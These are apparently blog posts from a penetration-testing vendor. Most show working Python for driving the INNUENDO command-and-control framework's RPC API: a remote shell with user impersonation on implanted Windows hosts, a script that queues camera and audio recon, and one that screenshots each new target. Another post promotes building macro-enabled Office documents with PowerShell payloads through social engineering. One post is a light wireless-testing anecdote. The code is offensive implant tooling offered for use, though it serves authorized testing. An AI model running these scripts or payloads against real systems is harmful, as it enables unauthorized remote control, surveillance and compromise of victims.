Wednesday, December 14, 2016

INNUENDO RPC: shell

This is the third installment of this series. Here are links for the first and second. For this post we're going to take a look at the implementation of a command shell using INNUENDO's RPC API.

Essentially, what this script does is:

Accepts a command from the user on the terminal.
Queues a filemanager/execute operation in the INNUENDO C2, using the RPC API.
Waits for the operation to complete, and dumps the output to the terminal.

Since the script depends on the execute operation, it is able to take full advantage of capabilities such as user impersonation, allowing you to run the shell as any user on the target system.

Remember as well that thanks to the design of INNUENDO's channels, this shell is resilient to any sort of communication failure. If the web channel were to go down just after entering a command, you would still get the command's output as soon as the implant is able to sync again (maybe over the DNS channel).

Also note that the response time of the command will depend on the active channel of the target implant, and the configured sync_frequency for that channel. So while a command shell is an interesting experiment for how the RPC API can be used, it won't be practical except where sync frequencies are very low (or patience is very high).

Here is a video demonstrating the functionality of this script:



Shell


The script accepts a few command-line arguments.

usage: shell.py [-h] [-c COMMAND] [--no-cache] [--token-user TOKEN_USER]
                [--token-luid TOKEN_LUID] [-p PROMPT] [-u URL]
                process_implant_id

Command-line interface to an INNUENDO implant target shell.

NOTE: The "process_implant_id" argument refers to the hash ID listed for an
implant in the process_list. Not to be confused with the PID.

    $ ./rpc.py process_list
    Machine: <machine_id>
      Node: <node_id>
        <process_implant_id> | synced | ...

positional arguments:
  process_implant_id    the ID of the implant process to target

optional arguments:
  -h, --help            show this help message and exit
  -c COMMAND, --command COMMAND
                        execute a command then exit
  --no-cache            do not use cached data for initialization
  --token-user TOKEN_USER
                        attempt impersonation of a "[domain\]user"
  --token-luid TOKEN_LUID
                        sets a token LUID for impersonation
  -p PROMPT, --prompt PROMPT
                        a windows prompt format string
  -u URL, --url URL     rpc server url

The only thing that is required to use the shell script is a target implant, which we can easily get using the RPC command-line script's process_list command.

$ ./rpc.py process_list 
Machine: 96e41afa2cfbe7b26d3b5c397abb2b8f5198bdb3
 Node: c8aaddbc059b40f4a3f7d61945cb2684
  b850bef0abe4417debc273c640be7e58 | synced | 2016-12-14 13:31:47 | boot64.exe (1572)
 Node: nt authority\system
  de1014f777018dffd21678d2e7a3f5c0 | synced | 2016-12-14 13:31:50 | netclassmon.exe (1864)

Note that the process_implant_id is not just the PID. It's the hash before the sync status. Once we have one, we can pass it to the shell script.

$ python -m examples.rpc.shell de1014f777018dffd21678d2e7a3f5c0
initializing ...
Microsoft Windows [Version 6.1.7601]

C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> exit

We can even use impersonation to run our shell as a different user.

$ python -m examples.rpc.shell de1014f777018dffd21678d2e7a3f5c0 --token-user immunity
initializing ...
Microsoft Windows [Version 6.1.7601]

C:\Windows\system32> whoami
bunny\immunity

Notice how the shell behaves as you would expect it to when running as the "immunity" user.

C:\Windows\system32> cd c:\users\administrator
Access is denied.
C:\Windows\system32> cd c:\users\immunity
c:\Users\immunity> dir
 Volume in drive C has no label.
 Volume Serial Number is 883B-C53C

 Directory of c:\Users\immunity

12/19/2013  05:11 PM    <DIR>          .
12/19/2013  05:11 PM    <DIR>          ..
12/19/2013  05:11 PM    <DIR>          Contacts
07/13/2016  10:46 AM    <DIR>          Desktop
12/19/2013  05:11 PM    <DIR>          Documents
12/20/2013  12:14 PM    <DIR>          Downloads
12/19/2013  05:11 PM    <DIR>          Favorites
12/19/2013  05:11 PM    <DIR>          Links
12/19/2013  05:11 PM    <DIR>          Music
12/19/2013  05:11 PM    <DIR>          Pictures
12/19/2013  05:11 PM    <DIR>          Saved Games
12/19/2013  05:11 PM    <DIR>          Searches
12/19/2013  05:11 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  54,171,832,320 bytes free
c:\Users\immunity>

Source


The full source is at the bottom of the post, but let's step through some of the more interesting bits.

To start, we import the modules that we need and set some global variables. We import the readline module when it's available to give us command history for free.

try:
    import readline
except ImportError:
    pass

We also set some tag names which this script will use to locate specific operation results.

PROMPT = '$p$g$s'
TAG_ENV = 'shell:environment'
TAG_META = 'shell:metadata'

Next, we have our main class. client is the INNUENDO RPC client. proc_id is the ID of the target implant. The other variables track the current state of the shell.

    def repl(self):
        """The Read-Eval-Print Loop."""

        while True:
            prompt = self.parse_prompt()
            oper_id = None
            try:
                line = raw_input(prompt).strip()

                oper_id = self.execute(line, wait=wait)

The setup method queues some operations to pull environment variables and other metadata from the target. First, though, it checks to see if operations that have the required information have already been executed by searching for specific tags.

Checking for an existing operation:

            search = ' '.join([TAG_ENV, token_tag, self.proc_id])
            res = c.operation_list(search=search, limit=1)
            if res['records']:
                oper = res['records'][0]
                self.check_error(oper)
                self.env = c.operation_attributes(oper['id'])['env']

Executing and tagging an operation, if there is no existing operation:

            oper_id = c.operation_execute('recon', 'environment', self.proc_id)[0]
            self.check_error(c.operation_wait(oper_id)[0])

            self.env = c.operation_attributes(oper_id)['env']

            c.operation_tag_add(TAG_ENV, oper_id)
            c.operation_tag_add(token_tag, oper_id)

The execute method simply wraps the entered command so that it is executed in correct directory.

            command = 'cd /D %s && %s' % (self.cwd, command)

It also tags the operation with the command name to make it easy to find the results for certain commands, and to provide context when looking at a list of execute operations.

        tag = ':'.join(['cmd', command.split(None, 1)[0]])

        res = c.operation_execute('filemanager', 'execute', self.proc_id, args=args)
        c.operation_tag_add(tag, res[0])

The remaining methods are helpers.

wait waits for an operation to complete. It also contains the logic for handling "CTRL+C", and terminating any processes that were started by a command.

output collects the stdout and stderr from a command and formats them for output to the terminal.

check_error checks the result of the operation and exits the script if there was an unexpected failure.

kill wraps a call to the manager/terminate operation.

chdir checks if the requested directory exists on the target and stores the path locally. The "current directory" is attached to every command so that it is executed in the correct context.

parse_prompt parses the PROMPT environment variable and does it's best to fill in the appropriate values. You get the same prompt the target system's user has set!

Finally, we have the code that set's up the command-line arguments, connects to INNUENDO with the RPC client, and starts the REPL.

Here is the full source:

#! /usr/bin/env python

"""
Command-line interface to an INNUENDO implant target shell.
"""

import re
import sys
import ntpath
try:
    import readline
except ImportError:
    pass

import rpc

PROMPT = '$p$g$s'
TAG_ENV = 'shell:environment'
TAG_META = 'shell:metadata'

rx_prompt = re.compile(r'[$](.)')

class Shell(object):
    def __init__(self, client, proc_id, token_user=None, token_luid=None, prompt=None):
        self.client = client
        self.proc_id = proc_id
        self.env = None
        self.ver = None
        self.cwd = None
        self.token_user = token_user
        self.token_luid = token_luid
        self.prompt = prompt

    def repl(self):
        """The Read-Eval-Print Loop."""
        c = self.client

        print self.ver
        print

        while True:
            prompt = self.parse_prompt()
            oper_id = None
            try:
                line = raw_input(prompt).strip()
                if not line:
                    continue
                if line.lower() == 'exit':
                    break
                if line.lower().startswith('cd'):
                    try:
                        path = line.split(' ', 1)[1].strip()
                    except IndexError:
                        pass
                    else:
                        self.chdir(path)
                        continue
                wait = line[-1] != '&'

                oper_id = self.execute(line, wait=wait)
                if wait:
                    self.wait(oper_id)
                    print self.output(oper_id)

            except EOFError:
                break
            except KeyboardInterrupt:
                print
                continue

    def setup(self, cached=True):
        """Collect metadata used to format the shell.

        Uses existing operations when *cached* is `True`.
        """
        c = self.client

        # if the luid is set, it takes precedence
        token_tag = ':'.join(['token', self.token_luid or self.token_user or 'none'])

        if cached:
            # check past ops
            search = ' '.join([TAG_META, token_tag, self.proc_id])
            res = c.operation_list(search=search, limit=1)
            if res['records']:
                oper = res['records'][0]
                self.check_error(oper)
                self.ver, self.cwd = self.output(oper['id']).strip().splitlines()

            search = ' '.join([TAG_ENV, token_tag, self.proc_id])
            res = c.operation_list(search=search, limit=1)
            if res['records']:
                oper = res['records'][0]
                self.check_error(oper)
                self.env = c.operation_attributes(oper['id'])['env']

        if not self.cwd:
            oper_id = self.execute('ver && cd')
            self.check_error(self.wait(oper_id))

            self.ver, self.cwd = self.output(oper_id).strip().splitlines()

            c.operation_tag_add(TAG_META, oper_id)
            c.operation_tag_add(token_tag, oper_id)

        if not self.env:
            oper_id = c.operation_execute('recon', 'environment', self.proc_id)[0]
            self.check_error(c.operation_wait(oper_id)[0])

            self.env = c.operation_attributes(oper_id)['env']

            c.operation_tag_add(TAG_ENV, oper_id)
            c.operation_tag_add(token_tag, oper_id)

    def execute(self, command, wait=True):
        """Executes a command on the targets and returns the operation ID."""
        c = self.client

        tag = ':'.join(['cmd', command.split(None, 1)[0]])
        if self.cwd:
            command = 'cd /D %s && %s' % (self.cwd, command)
        args = {
            'path': command,
            'shell': True,
            'output_capture': True,
            }
        if not wait:
            args['output_capture'] = False
            args['wait'] = False
        if self.token_user:
            args['token_domain_user'] = self.token_user
        if self.token_luid:
            args['token_luid'] = self.token_luid

        res = c.operation_execute('filemanager', 'execute', self.proc_id, args=args)
        c.operation_tag_add(tag, res[0])
        return res[0]

    def wait(self, oper_id):
        """Waits for *oper_id* to complete and returns the operation.

        If a `KeyboardInterrupt` is caught while waiting for the operation,
        the operation will be cancelled, and any processes it started will be
        killed.
        """
        c = self.client

        try:
            return c.operation_wait(oper_id)[0]
        except KeyboardInterrupt:
            res = c.operation_attributes(oper_id)
            if res['process_id']:
                print 'killing tree: %(process_id)s' % res
                self.kill(res['process_id'])
            c.operation_cancel(oper_id)
            print
            raise

    def output(self, oper_id):
        """Returns a string containing the stdout and stderr of *oper_id*."""
        c = self.client

        out = []
        attrs = c.operation_attributes(oper_id)

        stdout = attrs['stdout']
        stderr = attrs['stderr']
        if stdout:
            out.append(stdout.rstrip())
        if stderr:
            out.append(stderr.rstrip())

        return '\n'.join(out)

    def check_error(self, oper):
        """Exits the program if *oper* contains an error."""
        if not oper['success']:
            sys.exit('\n'.join([oper['error'], oper['exception']]))

    def kill(self, pid, recurse=True):
        """Kills the process with *pid* on the target."""
        c = self.client
        return c.operation_execute('manager', 'terminate', self.proc_id, args={
            'process_id': pid, 'recurse': recurse,
            })

    def chdir(self, path):
        """Changes the current working directory.

        The target is first checked to verify that *path* is valid.
        """
        c = self.client

        oper_id = self.execute('cd /D %s && cd' % path)
        attrs = c.operation_attributes(oper_id)
        output = self.output(oper_id)

        # set the new cwd if the command succeeded
        if attrs['return_code'] == 0:
            self.cwd = output
        else:
            print output

    def parse_prompt(self):
        """Returns a Windows prompt with codes subtituted with their respective
        values.

        Not supported: $+, $M
        """
        prompt = self.env.get('PROMPT', PROMPT) if self.prompt is None else self.prompt
        result = []
        for match in rx_prompt.finditer(prompt):
            code = match.group(1).lower()
            result.append({
                'a': '&',
                'b': '|',
                'c': '(',
                'd': '<current date>', # TODO
                'e': '\x27',
                'f': ')',
                'g': '>',
                'h': '\b',
                'l': '<',
                'n': ntpath.splitdrive(self.cwd)[0],
                'p': self.cwd,
                'q': '=',
                's': ' ',
                't': '<current time>', # TODO
                'v': self.ver,
                '_': '\n',
                '$': '$',
                }.get(code, ''))
        return ''.join(result)

def main():
    import argparse

    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument('process_implant_id')
    parser.add_argument('-c', '--command', help='execute a command then exit')
    parser.add_argument('--no-cache', action='store_false', dest='cached',
        help='do not use cached data for initialization')
    parser.add_argument('--token-user', help='attempt impersonation of a "[domain\]user"')
    parser.add_argument('--token-luid', help='sets a token LUID for impersonation')
    parser.add_argument('-p', '--prompt', help='a windows prompt format string')
    parser.add_argument('-u', '--url', help='rpc server url')

    args = parser.parse_args()
    proc_id = args.process_implant_id

    c = rpc.Client(args.url)

    try:
        c.process_get(proc_id)
    except rpc.RemoteError:
        sys.exit('invalid target process')

    if args.command:
        shell = Shell(c, proc_id, args.token_user, args.token_luid)
        oper_id = shell.execute(args.command)
        shell.check_error(shell.wait(oper_id))
        print shell.output(oper_id)
        return

    print 'initializing ...'
    shell = Shell(c, proc_id, args.token_user, args.token_luid, args.prompt)
    shell.setup(cached=args.cached)

    # Enter REPL
    shell.repl()

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        pass

Friday, September 9, 2016

Leveraging INNUENDO's RPC for Fun and Profit: tagging

For the second installment of this series (see the previous here), we're going to take a look at the new tagging functionality that was added to INNUENDO 1.6.

It is now possible to tag both operations and processes, making it much more convenient to organize each in a wide variety of ways. All of this can be done from the INNUENDO Web UI, and you can see a demonstration of that in this video.

This post will demonstrate how you can use RPC to automatically add and remove tags based on the results of operations.

The first step is to set up an event stream, just as we did in the previous post.

>>> import pprint # to make it easier to look through results
>>> import rpc
>>> c = rpc.Client()
>>> for event in c.events():
...     pprint.pprint(event)
None
{'data': {'id': '...'},
 'name': 'machine_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 890128)}
{'data': {'id': '...'},
 'name': 'node_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 927102)}
{'data': {'id': '...'},
 'name': 'process_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 957477)}

This is a typical example of the output from an event stream. Note that it will occasionally return None, which we can safely ignore. For our purposes, the events we are interested in are operation_updated and process_added.

We can loop through the events and process them individually in a tree of if statements as in the previous post, but let's add a layer of abstraction to make life a bit easier.

import rpc

class Monitor(rpc.Client):
    def on_some_event(self, event):
        """Called when "some_event" is emitted."""
        pass


    def monitor(self):
        """Monitors events for any existing event handlers."""
        # create an event filter based on the existing handlers
        filter = [n[3:] for n in dir(self) if n.startswith('on_')]
        print 'monitoring: {}'.format(', '.join(filter))

        for event in self.events(*filter):
            if not event: continue
            handler = getattr(self, 'on_' + event['name'])
            handler(event)

This small subclass allows us to define event handler methods for events we're interested in, making it simple to add handlers for the events we're interested in. Now we can build off of that to begin processing events.

Let's add a handler to queue some operations every time a new process is added.

class Monitor(rpc.Client):
    # ... previous code ...
    def on_process_added(self, event):
        # all process events set event['data']['id'] to the relevant
        # process ID 
        proc_id = event['data']['id']
    
        # queue some recon operations
        self.operation_execute('recon', 'assign_aliases', proc_id)
        self.operation_execute('recon', 'audio_query', proc_id)
        self.operation_execute('recon', 'camera_query', proc_id)

That's all it takes. Those operations will be queued for execution with every new process that activates with the C2. This is nice, but it would be even better if we could process the results of those operations somehow.

One way to do that is to wait for the results to come in using
Client.operation_wait or Client.operation_call. However, by taking advantage of the event stream, we can process the results of every operation that is queued (even if queued in the Web UI), not just the ones we queue ourselves in the on_process_added handler.

So, let's add another handler to process operation results. For this event handler, we'll implement functionality similar to what is done in our monitor method to make it easy to process the results of different operations by adding handler methods.

class Monitor(rpc.Client):
    # ... previous code ...
    def on_operation_updated(self, event):
        # all operation events set event['data']['id'] to the relevant
        # operation ID
        oper_id = event['data']['id']
        # using the operation ID, we can retrieve the operation metadata
        oper = self.operation_get(oper_id)

        # and we can use the metadata to filter out operations that we're not
        # interested in. In this case, operations that are not finished
        if oper['state'] != 'finished':
            return

        # get operation attributes (these are the results)
        attrs = self.operation_attributes(oper['id'])

        # handle operation (if a matching 'handle_' method exists)
        handler = getattr(self, 'handle_' + oper['name'], None)
        if handler:
            # pass in both the operation metadata and attributes
            handler(oper, attrs)

Here, we're using a different method prefix (handle_) to define the methods that will handle operation results. Now we just have to add handlers for the operations we're interested in.

class Monitor(rpc.Client):
    # ... previous code ...
    def handle_assign_aliases(self, oper, attrs):
        # assign_aliases offers us a quick way to determine the target's
        # architecture, among other useful bits of info
        arch = attrs['info']['arch']

        # let's tag it!
        self.process_tag_add('arch:{}'.format(arch), oper)

    def handle_camera_query(self, oper, attrs):
        if attrs['cameras']:
            self.process_tag_add('has:camera', oper['id'])
        else:
            # a camera could be removed, so we should be able to update
            # the tag in that case
            self.process_tag_remove('has:camera', oper['id'])

    def handle_audio_query(self, oper, attrs):
        if attrs['devices']:
            self.process_tag_add('has:audio', oper['id'])
        else:
            # audio could be removed, so we should be able to update
            # the tag in that case
            self.process_tag_remove('has:audio', oper['id'])

How you tag your processes or operations is up to you, of course. We recommend a naming scheme that includes uniquely identifiable elements so the tags can be used to search for processes/operations.

Any added/removed tag will be reflected immediately in the Web UI.

Here is the full code.

import rpc

class Monitor(rpc.Client):
    ## operation result handlers ##

    def handle_assign_aliases(self, oper, attrs):
        arch = attrs['info']['arch']
        self.process_tag_add('arch:{}'.format(arch), oper['process_id'])

    def handle_camera_query(self, oper, attrs):
        if attrs['cameras']:
            self.process_tag_add('has:camera', oper['process_id'])
        else:
            self.process_tag_remove('has:camera', oper['process_id'])

    def handle_audio_query(self, oper, attrs):
        if attrs['devices']:
            self.process_tag_add('has:audio', oper['process_id'])
        else:
            self.process_tag_remove('has:audio', oper['process_id'])

    ## event handlers ##

    def on_process_added(self, event):
        proc_id = event['data']['id']
    
        # queue some recon operations
        self.operation_execute('recon', 'assign_aliases', proc_id)
        self.operation_execute('recon', 'audio_query', proc_id)
        self.operation_execute('recon', 'camera_query', proc_id)
    
    def on_operation_updated(self, event):
        oper_id = event['data']['id']
        oper = self.operation_get(oper_id)

        # filter
        if oper['state'] != 'finished':
            return

        # get operation attributes
        attrs = self.operation_attributes(oper['id'])

        # handle operation
        handler = getattr(self, 'handle_' + oper['name'], None)
        if handler:
            print 'handling operation:', oper['name']
            handler(oper, attrs)

    ## monitor ##

    def monitor(self):
        """Monitors events for any existing event handlers."""
        # create an event filter based on the existing handlers
        filter = [n[3:] for n in dir(self) if n.startswith('on_')]
        print 'monitoring: {}'.format(', '.join(filter))

        for event in self.events(*filter):
            if not event: continue
            print 'handling event:', event['name']
            handler = getattr(self, 'on_' + event['name'])
            handler(event)

if __name__ == '__main__':
    try:
        Monitor().monitor()
    except KeyboardInterrupt:
        pass

You can watch this script in action in the video mentioned at the top of this post.

Thursday, June 23, 2016

Wireless Penetration Testing: So easy anyone can do it!

My name is Lea Lewandowski and I am the newest member of the admin team at Immunity. I have a Bachelor of Science in Business Administration with a major in Marketing and a minor in Sociology and yes, even I can use SILICA. Prior to joining Immunity four weeks ago, I earned a living working at Starbucks for a year and a half, because like most college graduates, I did not have a full time career to jump right into. Then Immunity came along and decided to give me a shot at this thing called "real life work".  I can honestly say that I was not expecting to learn 'how to hack' during my second week at the company.

When I first heard that I was going to try to learn how to use SILICA I was pretty intimidated. Here I am, with no previous experience in computers or technology and I'm told to sit in front of this computer and get some passwords. Little did I know, this stuff is all automated. All I have to do is click some buttons. I swear, it is really that easy.  SILICA does all of the hard work for you, which makes the wireless penetration testing simple even for the non-techies of the world (like me!).

Ironically, my first SILICA lesson was at a Starbucks. We were there for less than half an hour and I was able to steal my own password from myself using the Fake AP (stands for Access Point, btw) feature. I also learned that I needed to fix the security settings on my iPhone. All I had to do was some clicky-clicky and then wait and, lo and behold, I got my password (which I have now changed).

Another feature that I learned how to use in a few minutes was the AP mapping tool. I was able to figure out how to use the AP mapping feature in the office and in my apartment. With this tool, I was able to find the exact location of AP's in both places. Pretty interesting stuff. Below is a picture of the AP mapping feature finding an AP in my apartment.
I didn't realize that I had to blur this out so you stalkers couldn't find my house! Learn something new everyday.
I created a map image of my apartment, imported it into the location capture tab, and walked around clicking different areas of the map. The outcome was a heat map of AP's around me. I found the AP in my apartment using the heat map, right clicked the AP for the signal strength and found exactly where the AP was located. The above image shows the signal strength at its highest because the SILICA was sitting right on top of the AP.

Although I'd love to sit here and tell you that I figured this all out because I'm some type of genius and a super fast learner but that isn't the case. My experiences with SILICA combined with my complete lack of any technical knowledge is proof that anyone can learn how to use SILICA. While awesome, it has definitely been an eye opening introduction to the security world.

Monday, May 23, 2016

The old Office Binder is back for more client-side funsies!



MS Office documents for targeted attacks: Re-Introducing CANVAS's Binderx module.

In targeted attacks, one of the most effective methods of compromising a remote computer is to send the victim a malicious Microsoft Office document with auto-executed VBA Macro. However,  MS Office Macros are not enabled by default and when a Macro-Embedded document is opened it will present a security warning stating that macros have been disabled and offering to “enable content”.   To achieve a successful exploitation the attacker must persuade the victim to click the button that will allow embedded Macro to run and compromise the system.  We will analyze some of the security warnings in the different MS Office versions.

VBA Macros and Ms Office's file formats

VBA Code or VBA Macros can be included in “legacy” binary formats such as .xls, .doc and .ppt
and in modern XML formatted documents like the Office Open XML file format (OOXML format) supported by MS Office 2007 and later. Documents, templates, worksheets, and presentations that you create in the MS Office 2007 release and later are saved with different file-name extensions with an “x” or an “m”.
For example, when you save a document in MS Word, the file now uses the .docx extension, instead of the .doc extension. 2007 release and later are saved with different file-name extensions with an “x” or an “m”.
For example, when you save a document in MS Word, the file now uses the .docx extension, instead of the .doc extension. To save a Macro-Embedded document you must save it as “Macro-Enabled Document” and the file-name extensions will be .docm (or .xlsm, .pptm, etc.). .

Illustration 1: Word Macro-Enabled documents in legacy format and OOXML format


Security Warnings in MS Office releases

VBA Macros are not enabled by default in MS Office versions. Hence the victim will see different warning messages.


MS Office 2007





MS Office 2010




MS Office 2016





In summary, the following table describes all messages produced when a Macro-Embedded file is opened. (Tested with legacy files and OOXML format files as well)



2007 2010 2013 2016
Security Warning Yes Yes Yes Yes
Security Alert Window Yes No No No


As we can see in the table above, in MS Office 2010 and higher versions there is no Security Alert Window. Of course, as we mentioned before, a successful exploitation relies on your social engineering skills to induce the victim to enable the macro execution.

Introducing Binderx module

CANVAS's Binderx module allows you to create an MS Office blank document with an embedded payload that will be executed using a VBA Macro.

Two types of document files can be created with the module: MS Word or MS Excel (using “legacy” format or OOXML format).

It is worth it to mention that MS Powerpoint does not include auto-execution Macro support like the ones available in MS Word and MS Excel.

Additionally, we added support to both Windows MOSDEF shellcode and PowerShell

Creating a legacy MS Word document with a PowerShell payload
Everyone loves a good shell!


Enjoy it! As always we appreciate any feedback from your experiences with these features during your penetration tests!

AnĂ­bal Irrera.

Wednesday, February 24, 2016

Leveraging INNUENDO's RPC for Fun and Profit: screengrab

INNUENDO 1.5 is on it's way, and along with a host of other great features, we've refined the RPC interface.

In this post I want to demonstrate how one can begin layering high-level automation on top of INNUENDO C2 operations using the RPC interface.

Let's start simple. All we want is a screenshot of the target machine every time a new implant process connects to the C2.

The first thing we need is access to the RPC client library. The RPC client can be found in the INNUENDO directory as "<innuendo>/innuendo_client.py". This file actually bundles all of the client dependencies within it, so the only requirement to use it is a Python (2.7) installation.

Once you've copied the client file to your local machine, you simply have to point it at the address and port of the C2 RPC server (and ensure that host/port is accessible, of course).

$ ./innuendo_client.py -u tcp://<c2-host>:9998 ping
ping?
pong!

You'll notice that you have full access to the command-line interface using this file, but we can get quite a bit more flexibility if we import it into Python.

>>> import innuendo_client

This first import bootstraps the environment, and gives us access to the RPC client and it's dependencies. Now, we can import the client library:

>>> from innuendo import rpc

Now, let's connect to the RPC server.

>>> c = rpc.Client('tcp://<c2-host>:9998')
>>> c.module_names()
('exploitmanager', 'recon', ...)

Excelsior! Let's watch some implants sync:

>>> for event in c.events('process'):
...     proc_id = event['data']['id']
...     proc = c.process_get(proc_id)
...     print proc['name'], proc['machine_alias']
netclassmon.exe Windows-7-x64-fuzzybunny
boot64.exe Windows-7-x64-wombat
rundll32.exe Windows-XP-x86-cabbage
boot64.exe Windows-7-x64-fuzzybunny
boot32.exe Windows-XP-x86-cabbage

NOTE: Here we are filtering for process events. If we wanted to grab all node events and any new machine events, we could call Client.events() like this instead: c.events('node', 'machine_added').

By reacting to this event stream, we can now begin to build a layer of automated decision-making on top of INNUENDO. A simple, but very useful option is to execute an operation or group of operations as soon as a new implant first syncs to the C2. Here's an example that takes a screenshot of the target as soon as an implant activates.

>>> for event in c.events('process_added'):
...     proc_id = event['data']['id']
...     c.operation_execute([proc_id], 'screengrab')

This snippet will queue a "recon.screengrab" operation on the C2 for every process that is added while the script is running. The GIF below shows us how it would look in INNUENDO's UI.



Let's take it a bit further and dump thumbnails of the screenshots into a local directory. The full source for catching the right events is below, but first let's just take a step-by-step look at grabbing operation results.

>>> import msgpack
>>> res = c.operation_attributes(oper_id)
>>> attrs = msgpack.unpackb(res)

Since operation attributes can potentially store large binary data, the RPC layer does not automatically deserialize them for you, so we do that with msgpack.

NOTE: msgpack is a serialization library. A pure-Python version is bundled with the client library, but if you need higher performance, you'll want to grab the full package off of PyPI, which includes a C implemention. The client will prefer an installed copy over the bundled copy.

>>> server_path = attrs['data'][0]['path']

This gives us the path of the screenshot image file on the C2 server. Index 0 is the first of potentially several images that could have been grabbed. Now we just have to ask the C2 for the file and save it locally.

>>> local_path = os.path.basename(remote_path)
>>> with open(local_path, 'w+b') as file:
...     for chunk in c.file_download(remote_path):
...         file.write(chunk)

This will stream the screenshot chunk-by-chunk to a file in the current directory. Let's put it all together!

import os

# bootstrap the client environment
import innuendo_client

import msgpack
from innuendo import rpc

def main():
    print 'waiting'
    
    c = rpc.Client()
    
    # track the operations we want to watch
    oper_ids = set()
    
    for event in c.events('process_added', 'operation_updated'):
        if not event:
            # the server will send out "heartbeat" events periodically
            # we can ignore them
            continue
        
        elif event['name'] == 'process_added':
            print 'process_added: taking screenshot'
            
            # grab the ID of the process that just activated
            proc_id = event['data']['id']
            
            # queue a screengrab operation and track it's ID
            res = c.operation_execute([proc_id], 'screengrab', wait=True)
            oper_ids.add(res[0])
            
            print 'operation_added:', res[0]
        
        elif event['name'] == 'operation_updated':
            # grab the ID of the operation that was just updated
            oper_id = event['data']['id']
            
            # make sure it's an operation we are tracking
            if oper_id not in oper_ids:
                continue
            
            # get the operation data so we can check it's state
            oper = c.operation_get(oper_id)
            print 'operation_updated:', oper['state']
            
            # wait until the operation is finished
            if oper['state'] != 'finished':
                continue
            oper_ids.remove(oper_id)
            
            # grab and unpack the operation's attributes
            res = c.operation_attributes(oper_id)
            attrs = msgpack.unpackb(res)
            
            # get the remote path of the first screenshot
            remote_path = attrs['data'][0]['path']
            local_path = os.path.basename(remote_path)
            
            # stream the screenshot to a local file
            with open(local_path, 'w+') as file:
                for chunk in c.file_download(remote_path):
                    file.write(chunk)
            print 'saved:', local_path

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        pass

With this script running, you should see a new screenshot saved to the current directory soon after every new implant process activates. This same procedure can be used to process results from any INNUENDO operation. Stay tuned for more!